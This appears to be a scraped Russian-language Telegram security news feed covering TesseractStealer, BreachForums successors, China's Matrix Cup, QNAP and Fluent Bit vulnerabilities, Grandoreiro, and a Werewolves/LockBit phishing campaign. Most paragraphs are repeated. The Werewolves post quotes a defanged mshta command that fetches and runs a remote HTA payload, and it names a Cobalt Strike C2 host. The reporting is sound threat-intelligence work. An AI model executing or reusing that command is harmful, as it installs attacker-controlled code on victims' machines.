Помимо Quasar RAT в наблюдавшейся атаке было замечено вредоносное ПО TesseractStealer, которое считывает изображения в зараженных системах и с помощью Tesseract извлекает текст, который выглядит как адреса криптовалют, начальные фразы или пароли, отправляя из на С2.
TesseractStealer сначала создает файлы библиотек Tesseract (tesseract50.dll) и Leptonica (leptonica-1.82.0.dll), а также файл обучающих данных (eng.traineddata) вместе с файлом шрифта (pdf.ttf).
Затем находит в системе файлы расширениями «.png», «.jpg» и «.jpeg», за исключением тех, которые расположены в каталоге редактора. Затем с использованием установленной библиотеки Tesseract извлекает строки из каждого изображения.
Проверка выявляет наличие связей с OTP, паролями, необходимыми для восстановления, адресами криптокошельков и другими подобными данными, явно нацеливая на цифровые активы жертв. После чего нужные изображения отправляются на С2.
Полный набор IoC, включая и список поисковых фраз - в отчете AhnLab.
ASEC
ViperSoftX Uses Deep Learning-based Tesseract to Exfiltrate Information - ASEC
ViperSoftX Uses Deep Learning-based Tesseract to Exfiltrate Information ASEC
This media is not supported in your browser
VIEW IN TELEGRAM
Киберпанк, который мы заслужили. Часть 4.
Широко известный в киберподполье и некогда взломавший портал InfraGard ФБР США хакер USDoD намерен запустить ребрендинговую версию Breach Nation, которая, по задумке автора, должна стать алтернативой закрытому BreachForums.
Свое заявление об этом USDoD сделал в X всего через сутки после того, как 15 мая агенты ФБР США отдефейсили BreachForums и заявили об аресте его админов.
Согласно проекту USDoD, новая площадка будет включать два независимо управляемых сервера с доменами будут breachnation[.]io и databreached[.]io, а запуск ее намечен на 4 июля 2024 года.
Главным мотивом в работе USDoD называет желание возродить сообщество и обеспечить его работоспособность, нежели просто навариться, изложив по этому поводу свои мысли в нескольких пространных постах.
Вполне возможно, что USDoD удастся реализовать свои планы, но, как считают исследователи Acumen, у этого предприятия, скорее всего, будет «ограниченный срок годности».
Ведь хронология всех событий, последовавших после ареста главного админа BreachForums 21-летнего Конора Брайана Фитцпатрика, указывает на явную их режиссуру со стороны спецслужб.
Сам Помпомпурин отделался легким испугом и получил условно-досрочный срок на 20 лет, его заместитель - Бафомет как бы арестован, но без официальных сообщений от Минюста или ФБР.
Впрочем как и с пресловутой хакерской бандой Shiny Hunters, которая также намерена перезапустить проект под своим началом, на что USDoD отреагировал весьма скептично, сославшись на историю с BF V2.
Как бы то ни было, в любом случае будем посмотреть.
Свое заявление об этом USDoD сделал в X всего через сутки после того, как 15 мая агенты ФБР США отдефейсили BreachForums и заявили об аресте его админов.
Согласно проекту USDoD, новая площадка будет включать два независимо управляемых сервера с доменами будут breachnation[.]io и databreached[.]io, а запуск ее намечен на 4 июля 2024 года.
Главным мотивом в работе USDoD называет желание возродить сообщество и обеспечить его работоспособность, нежели просто навариться, изложив по этому поводу свои мысли в нескольких пространных постах.
Вполне возможно, что USDoD удастся реализовать свои планы, но, как считают исследователи Acumen, у этого предприятия, скорее всего, будет «ограниченный срок годности».
Ведь хронология всех событий, последовавших после ареста главного админа BreachForums 21-летнего Конора Брайана Фитцпатрика, указывает на явную их режиссуру со стороны спецслужб.
Сам Помпомпурин отделался легким испугом и получил условно-досрочный срок на 20 лет, его заместитель - Бафомет как бы арестован, но без официальных сообщений от Минюста или ФБР.
Впрочем как и с пресловутой хакерской бандой Shiny Hunters, которая также намерена перезапустить проект под своим началом, на что USDoD отреагировал весьма скептично, сославшись на историю с BF V2.
Как бы то ни было, в любом случае будем посмотреть.
Китай запускает свой Pwn2Own под названием Matrix Cup по образцу уже известного другого китайского хакерского конкурса Tianfu Cup.
Новый китайский поединок поспешили назвать «главным соревнованим по кибербезопасности в восточном полушарии».
И не зря, ведь призовой фонд первого этапа составит 20 млн. юаней (2,75 млн. долл. США), в том числе 18 млн. юаней (2,5 млн. долл. США) за 0-day эксплойты.
Он состоится 26-28 июня в городе Циндао, организатором выступят Qihoo 360 и Beijing Huayun'an Information Technology.
В целевой список входят китайские и западные продукты, а также алгоритмы искусственного интеллекта.
В их числе: ОС Windows, Linux и macOS, устройства Samsung Galaxy, Google Pixel, iPhone и др. китайские бренды, корпоративные продукты Microsoft, Zimbra, F5 и Citrix, сетевые устройства Cisco, Juniper Networks, Sonicwall и Linksys, устройства NAS от WD, Synology и QNAP, а такеж защитные решения от Fortinet, Checkpoint, Cisco, Ivanti и Kaspersky.
Кроме того, заявлены: продукты MariaDB, SQL Server, MySQL и Oracle Database, инструменты Adobe Reader, Microsoft Teams, Zoom и Microsoft Office, браузеры Chrome, Firefox, Edge и Safari, технологии виртуализации VMware, QEMU, Docker, Microsoft и Oracle, принтера HP и платформа Hadoop.
Правда относительно того, как будут информироваться поставщики на официальном сайте ничего упоминается, в отличие от того же Pwn2Own от Trend Micro.
Можно лишь констатировать, что согласно китайскому законодательству при любом раскладе по всем 0-day в первую очередь будет проинформировано правительство КНР.
Тем не менее, на западе активно критикуют китайский аналог Pwn2Own, обвиняя в задействовании засветившихся на Tianfu Cup эксплойтов в операциях APT.
С другой стороны, западные оппоненты уже не раз попадались на том, что те же 0-day внедряли еще на этапе разработки, а после фиксили задним числом в своих бюллетенях. Microsoft не даст соврать.
Новый китайский поединок поспешили назвать «главным соревнованим по кибербезопасности в восточном полушарии».
И не зря, ведь призовой фонд первого этапа составит 20 млн. юаней (2,75 млн. долл. США), в том числе 18 млн. юаней (2,5 млн. долл. США) за 0-day эксплойты.
Он состоится 26-28 июня в городе Циндао, организатором выступят Qihoo 360 и Beijing Huayun'an Information Technology.
В целевой список входят китайские и западные продукты, а также алгоритмы искусственного интеллекта.
В их числе: ОС Windows, Linux и macOS, устройства Samsung Galaxy, Google Pixel, iPhone и др. китайские бренды, корпоративные продукты Microsoft, Zimbra, F5 и Citrix, сетевые устройства Cisco, Juniper Networks, Sonicwall и Linksys, устройства NAS от WD, Synology и QNAP, а такеж защитные решения от Fortinet, Checkpoint, Cisco, Ivanti и Kaspersky.
Кроме того, заявлены: продукты MariaDB, SQL Server, MySQL и Oracle Database, инструменты Adobe Reader, Microsoft Teams, Zoom и Microsoft Office, браузеры Chrome, Firefox, Edge и Safari, технологии виртуализации VMware, QEMU, Docker, Microsoft и Oracle, принтера HP и платформа Hadoop.
Правда относительно того, как будут информироваться поставщики на официальном сайте ничего упоминается, в отличие от того же Pwn2Own от Trend Micro.
Можно лишь констатировать, что согласно китайскому законодательству при любом раскладе по всем 0-day в первую очередь будет проинформировано правительство КНР.
Тем не менее, на западе активно критикуют китайский аналог Pwn2Own, обвиняя в задействовании засветившихся на Tianfu Cup эксплойтов в операциях APT.
С другой стороны, западные оппоненты уже не раз попадались на том, что те же 0-day внедряли еще на этапе разработки, а после фиксили задним числом в своих бюллетенях. Microsoft не даст соврать.
Исследователи из watchTowr Labs стали предвестниками новых печальных новостей для владельцев устройств NAS QNAP, которые, как мы знаем, пользуются особым интересом со стороны банд вымогателей и APT.
На этот раз во встроенном ПО NAS обнаружено 15 уязвимостей, некоторые из которых могут быть использованы для атак с удаленным выполнением кода, не требующих аутентификации.
В своем отчете исследователи сосредоточились на на одном из них — CVE-2024-27130, ошибке переполнения стека без аутентификации, которая позволяет удаленно выполнять код (хотя и с небольшим предварительным условием).
Самое печальное то, что к настоящему времени поставщик исправил только первые четыре из пятнадцати, не включая CVE-2024-27130, для них доступны исправленные QTS 5.1.6.2722, сборка 20240402 и QuTS Hero h5.1.6.2734, сборка 20240414.
Тем не менее, после выдачи поставщику ряд продлений срока в рамках скоординированного раскрытия watchTowr Labs опубликовала PoC для одной из наиболее серьезных ошибок в наборе.
Всем затронутым пользователям исследователи порекомендовали рассмотреть возможность отключения таких систем или строго ограничить доступ до тех пор, пока не будут доступны исправления.
А будут они не скоро, ведь, как отметили в watchTowr, у QNAP мягко сказать замудренная кодовая база на любимом языке хакеров C с тяжелыми устаревшими компонентами.
Но это не останавливает исследователей и в ближайшее время будут выходить новые отчеты по оставшимся проблемам, которые с нетерпением также будут ждать операторы DeadBolt, Checkmate и Qlocker.
На этот раз во встроенном ПО NAS обнаружено 15 уязвимостей, некоторые из которых могут быть использованы для атак с удаленным выполнением кода, не требующих аутентификации.
В своем отчете исследователи сосредоточились на на одном из них — CVE-2024-27130, ошибке переполнения стека без аутентификации, которая позволяет удаленно выполнять код (хотя и с небольшим предварительным условием).
Самое печальное то, что к настоящему времени поставщик исправил только первые четыре из пятнадцати, не включая CVE-2024-27130, для них доступны исправленные QTS 5.1.6.2722, сборка 20240402 и QuTS Hero h5.1.6.2734, сборка 20240414.
Тем не менее, после выдачи поставщику ряд продлений срока в рамках скоординированного раскрытия watchTowr Labs опубликовала PoC для одной из наиболее серьезных ошибок в наборе.
Всем затронутым пользователям исследователи порекомендовали рассмотреть возможность отключения таких систем или строго ограничить доступ до тех пор, пока не будут доступны исправления.
А будут они не скоро, ведь, как отметили в watchTowr, у QNAP мягко сказать замудренная кодовая база на любимом языке хакеров C с тяжелыми устаревшими компонентами.
Но это не останавливает исследователей и в ближайшее время будут выходить новые отчеты по оставшимся проблемам, которые с нетерпением также будут ждать операторы DeadBolt, Checkmate и Qlocker.
watchTowr Labs
QNAP QTS - QNAPping At The Wheel (CVE-2024-27130 and friends)
Infosec is, at it’s heart, all about that data. Obtaining access to it (or disrupting access to it) is in every ransomware gang and APT group’s top-10 to-do-list items, and so it makes sense that our research voyage would, at some point, cross paths with…
͏Исследователи F.A.C.C.T. сообщили о новой волне атак с вредоносными рассылками со стороны Werewolves, специализирующейся на вымогательстве с помощью версии программы-вымогателя LockBit3 (Black), собранной на основе утекшего билдера.
Банда практикует технику двойного давления на жертву: кроме вымогательства за расшифровку данных, злоумышленники выкладывают на сайте информацию о тех, кто отказался платить выкуп, сумма которого обычно составляет 130 000 - 1 000 000$.
Ранее в апреле этого года вымогатели засветили, осуществляя массовые рассылки на тему весеннего призыва и досудебных претензий.
Целями новых атак стали российские промышленные предприятия, телекоммуникационные и IT-компании, финансовые и страховые организации.
Злоумышленники создали фейковый сайт крупного российского производителя спецтехники, полностью эмулировав содержимое оригинального портала с помощью HTTrack Website Copier. Отличие заключалось лишь в доменном имени: у оригинального - com, у фейка - ru.
Письма с темами «Досудебная претензия» и «Рекламация» содержали вредоносные вложения, загружающие Cobalt Strike Beacon.
После того, как жертва открывает вложенный документ «Рекламация.doc» загружается RTF-документ, эксплуатирующий уязвимость CVE-2017-11882.
На устройство жертвы доставляется HTA (HTML Application): mshta https://iplis[.]ru/laydowngrenade.jpeg -> hxxp://vlasta-s[.]ru/logista.hta.
HTA-файл выполняет powershell-команду, в результате которой распаковывается и запускается шелл-код Cobalt Strike Stager, который загружает Сobalt Strike Beacon, конфигурация которого содержит watermark: 987654321 и C&C: poopy[.]aarkhipov[.]ru.
Банда практикует технику двойного давления на жертву: кроме вымогательства за расшифровку данных, злоумышленники выкладывают на сайте информацию о тех, кто отказался платить выкуп, сумма которого обычно составляет 130 000 - 1 000 000$.
Ранее в апреле этого года вымогатели засветили, осуществляя массовые рассылки на тему весеннего призыва и досудебных претензий.
Целями новых атак стали российские промышленные предприятия, телекоммуникационные и IT-компании, финансовые и страховые организации.
Злоумышленники создали фейковый сайт крупного российского производителя спецтехники, полностью эмулировав содержимое оригинального портала с помощью HTTrack Website Copier. Отличие заключалось лишь в доменном имени: у оригинального - com, у фейка - ru.
Письма с темами «Досудебная претензия» и «Рекламация» содержали вредоносные вложения, загружающие Cobalt Strike Beacon.
После того, как жертва открывает вложенный документ «Рекламация.doc» загружается RTF-документ, эксплуатирующий уязвимость CVE-2017-11882.
На устройство жертвы доставляется HTA (HTML Application): mshta https://iplis[.]ru/laydowngrenade.jpeg -> hxxp://vlasta-s[.]ru/logista.hta.
HTA-файл выполняет powershell-команду, в результате которой распаковывается и запускается шелл-код Cobalt Strike Stager, который загружает Сobalt Strike Beacon, конфигурация которого содержит watermark: 987654321 и C&C: poopy[.]aarkhipov[.]ru.
Исследователи IBM сообщают о возвращении вредоносного ПО Grandoreiro после того, как пять разработчиков были задержаны в результате силовой операции в Бразилии в начале прошлого года.
Замеченный в 2017 году Grandoreiro таргетирвоался на испаноязычные страны и привело к хищениям в размере 120 миллионов долларов.
Вернувшийся Grandoreiro теперь задействован в крупномасштабной фишинговой кампании с марта 2024 года, вероятно, в рамках модели MaaS и нацелен на более чем в 60 стран и порядка 1500 банков.
Сам троян подвергся технической модернизации, в результате которой было добавлено множество новых мощных функций и улучшений, а фишинговые приманки разнообразны специально под конкретных жертв.
В электронных письмах авторы выдают себя за правительственные учреждения из Мексике, Аргентине и Южной Африке, в основном за налоговые службы и федеральные органы по электроэнергетике.
Среди замеченных IBM X-Force улучшений: переработанный алгоритм дешифрования строк с использованием комбинации AES CBC и специального декодера, алгоритма генерации домена (DGA), новые механизмы сохранения и отключения системы безопасности в Microsoft Outlook и рассылки на новые цели.
Кроме того, расширен таргетинг банковских приложений и криптокошельков. Обновленный набора команд теперь включает удаленное управление, загрузку/загрузку файлов, ведение журнала клавиатуры и манипулирование браузером с помощью команд JavaScript.
Еще одна примечательная новая функция - это способность Grandoreiro выполнять детальное профилирование жертв для решения о выполнении на устройстве.
При этом аналитики IBM сообщают, что последняя версия трояна избегает запуска в определенных странах, таких как Россия, Чехия, Нидерланды и Польша, а также на компьютерах с Windows 7 в США, где не активен антивирус.
Таким образом, несмотря на недавние действия правоохранительных органов, Grandoreiro жив и теперь более активен, значительно увеличивая свой таргетинг, а вместе с ним и гонорар своих операторов.
Замеченный в 2017 году Grandoreiro таргетирвоался на испаноязычные страны и привело к хищениям в размере 120 миллионов долларов.
Вернувшийся Grandoreiro теперь задействован в крупномасштабной фишинговой кампании с марта 2024 года, вероятно, в рамках модели MaaS и нацелен на более чем в 60 стран и порядка 1500 банков.
Сам троян подвергся технической модернизации, в результате которой было добавлено множество новых мощных функций и улучшений, а фишинговые приманки разнообразны специально под конкретных жертв.
В электронных письмах авторы выдают себя за правительственные учреждения из Мексике, Аргентине и Южной Африке, в основном за налоговые службы и федеральные органы по электроэнергетике.
Среди замеченных IBM X-Force улучшений: переработанный алгоритм дешифрования строк с использованием комбинации AES CBC и специального декодера, алгоритма генерации домена (DGA), новые механизмы сохранения и отключения системы безопасности в Microsoft Outlook и рассылки на новые цели.
Кроме того, расширен таргетинг банковских приложений и криптокошельков. Обновленный набора команд теперь включает удаленное управление, загрузку/загрузку файлов, ведение журнала клавиатуры и манипулирование браузером с помощью команд JavaScript.
Еще одна примечательная новая функция - это способность Grandoreiro выполнять детальное профилирование жертв для решения о выполнении на устройстве.
При этом аналитики IBM сообщают, что последняя версия трояна избегает запуска в определенных странах, таких как Россия, Чехия, Нидерланды и Польша, а также на компьютерах с Windows 7 в США, где не активен антивирус.
Таким образом, несмотря на недавние действия правоохранительных органов, Grandoreiro жив и теперь более активен, значительно увеличивая свой таргетинг, а вместе с ним и гонорар своих операторов.
Security Intelligence
Grandoreiro banking trojan unleashed: X-Force observing emerging global campaigns
Since March 2024, IBM X-Force has been tracking several large-scale phishing campaigns distributing the Grandoreiro banking trojan.
͏Ежегодно спецы из Cyber Threat Intelligence Лаборатории Касперского делятся с инфосек-сообществом результатами глобальных исследований по APT и ransomware, проделывая при этом глубочайшую аналитическую работу и штудируя сотни инцидентов по всему миру и миллионы образцов вредоносного ПО.
В 2024 году в ЛК решили качественно изменить подход и представить серию более целевых отчётов о киберугрозах по конкретным регионам, каждый из которых станет настоящим must have для отраслевых экспертов, аналитиков и ИБ-специалистов всех мастей, включая SOC, Cyber Threat Intelligence, DFIR и Threat Hunting.
Первый из них посвящен анализу ландшафта угроз для России и стран СНГ.
В его основе анализ стратегий злоумышленников при вторжении в различные инфраструктуры с обширной базой по TTPs, описанных в рамках уникальной методологии Unified Kill Chain.
Проследив за динамикой атак и угроз, исследовали ЛК отмечают активизацию проявлений хактивизма, сопутствующих росту нападений с использованием доступного инструментария и безотносительно отраслевой принадлежности.
Не снижают своей значимости угрозы, исходящие от APT-групп и банд вымогателей, активность которых продолжает оставаться актуальной для изучаемого региона.
И при всем при этом, традиционно наблюдается давняя тенденция, связанная с таргетингом злоумышленников на наиболее доступные объекты с низким уровнем кибербезопасности.
В целом, основная цель исследования, на наш взгляд, реализована.
Разработанный ЛК материал определенно стоит рассматривать в качестве боевого руководства для разработки наиболее эффективных подходов по предотвращению и реагированию на киберугрозы.
Так что настоятельно рекомендуем ознакомиться с Полной версией отчета «Ландшафт угроз для России и СНГ в 2024 году» (PDF).
В 2024 году в ЛК решили качественно изменить подход и представить серию более целевых отчётов о киберугрозах по конкретным регионам, каждый из которых станет настоящим must have для отраслевых экспертов, аналитиков и ИБ-специалистов всех мастей, включая SOC, Cyber Threat Intelligence, DFIR и Threat Hunting.
Первый из них посвящен анализу ландшафта угроз для России и стран СНГ.
В его основе анализ стратегий злоумышленников при вторжении в различные инфраструктуры с обширной базой по TTPs, описанных в рамках уникальной методологии Unified Kill Chain.
Проследив за динамикой атак и угроз, исследовали ЛК отмечают активизацию проявлений хактивизма, сопутствующих росту нападений с использованием доступного инструментария и безотносительно отраслевой принадлежности.
Не снижают своей значимости угрозы, исходящие от APT-групп и банд вымогателей, активность которых продолжает оставаться актуальной для изучаемого региона.
И при всем при этом, традиционно наблюдается давняя тенденция, связанная с таргетингом злоумышленников на наиболее доступные объекты с низким уровнем кибербезопасности.
В целом, основная цель исследования, на наш взгляд, реализована.
Разработанный ЛК материал определенно стоит рассматривать в качестве боевого руководства для разработки наиболее эффективных подходов по предотвращению и реагированию на киберугрозы.
Так что настоятельно рекомендуем ознакомиться с Полной версией отчета «Ландшафт угроз для России и СНГ в 2024 году» (PDF).
Исследователи Tenable сообщают о критической уязвимости в Fluent Bit, которая затрагивает практически всех крупных облачных провайдеров.
Fluent Bit - это чрезвычайно популярное решение ведения журналов и метрик для Windows, Linux и macOS, встроенное в основные дистрибутивы Kubernetes, в том числе от Amazon AWS, Google GCP и Microsoft Azure.
Согласно статистике по состоянию на март 2024, Fluent Bit был загружен и развернут более 13 миллиардов раз и использует в числе прочих инфосек-вендорами Crowdstrike и Trend Micro, а также крупными технологическими компаниями, включая Cisco, VMware, Intel, Adobe и Dell.
Получившая название Linguistic Lumberjack и отслеживаемая как CVE-2024-4323, критическая уязвимость повреждения памяти появилась в версии 2.0.7 и обусловлена проблемой переполнения буфера кучи при анализе запросов трассировки встроенным HTTP-сервером Fluent Bit.
Помимо того, что неаутентифицированные злоумышленники могут легко воспользоваться уязвимостью безопасности для вызова DoS или удаленного захвата конфиденциальной информации, также ее можно задействовать для RCE (при наличии определенных условий и достаточного времени для создания эксплойта).
Учитывая последнее, исследователи полагают, что основные непосредственные риски связаны с возможностью доступной реализации DoS и утечки информации.
Tenable уведомила поставщика об ошибке 30 апреля, а исправления были внесены в основную ветку Fluent Bit уже 15 мая. Ожидается, что официальные выпуски с патчем будут поставляться с Fluent Bit 3.0.4 (пакеты Linux доступны здесь). Кроме того, проинформировали Microsoft, Amazon и Google.
В отсутствие исправлений для всех затронутых платформ клиентам следует смягчить проблему, ограничив доступ к API мониторинга Fluent Bit авторизованным пользователям и службам. Либо вовсе отключить уязвимую конечную точку API.
Fluent Bit - это чрезвычайно популярное решение ведения журналов и метрик для Windows, Linux и macOS, встроенное в основные дистрибутивы Kubernetes, в том числе от Amazon AWS, Google GCP и Microsoft Azure.
Согласно статистике по состоянию на март 2024, Fluent Bit был загружен и развернут более 13 миллиардов раз и использует в числе прочих инфосек-вендорами Crowdstrike и Trend Micro, а также крупными технологическими компаниями, включая Cisco, VMware, Intel, Adobe и Dell.
Получившая название Linguistic Lumberjack и отслеживаемая как CVE-2024-4323, критическая уязвимость повреждения памяти появилась в версии 2.0.7 и обусловлена проблемой переполнения буфера кучи при анализе запросов трассировки встроенным HTTP-сервером Fluent Bit.
Помимо того, что неаутентифицированные злоумышленники могут легко воспользоваться уязвимостью безопасности для вызова DoS или удаленного захвата конфиденциальной информации, также ее можно задействовать для RCE (при наличии определенных условий и достаточного времени для создания эксплойта).
Учитывая последнее, исследователи полагают, что основные непосредственные риски связаны с возможностью доступной реализации DoS и утечки информации.
Tenable уведомила поставщика об ошибке 30 апреля, а исправления были внесены в основную ветку Fluent Bit уже 15 мая. Ожидается, что официальные выпуски с патчем будут поставляться с Fluent Bit 3.0.4 (пакеты Linux доступны здесь). Кроме того, проинформировали Microsoft, Amazon и Google.
В отсутствие исправлений для всех затронутых платформ клиентам следует смягчить проблему, ограничив доступ к API мониторинга Fluent Bit авторизованным пользователям и службам. Либо вовсе отключить уязвимую конечную точку API.
Tenable®
Linguistic Lumberjack: Attacking Cloud Services via Logging Endpoints (Fluent Bit - CVE-2024-4323)
Tenable Research has discovered a critical memory corruption vulnerability dubbed Linguistic Lumberjack in Fluent Bit, a core component in the monitoring infrastructure of many cloud services.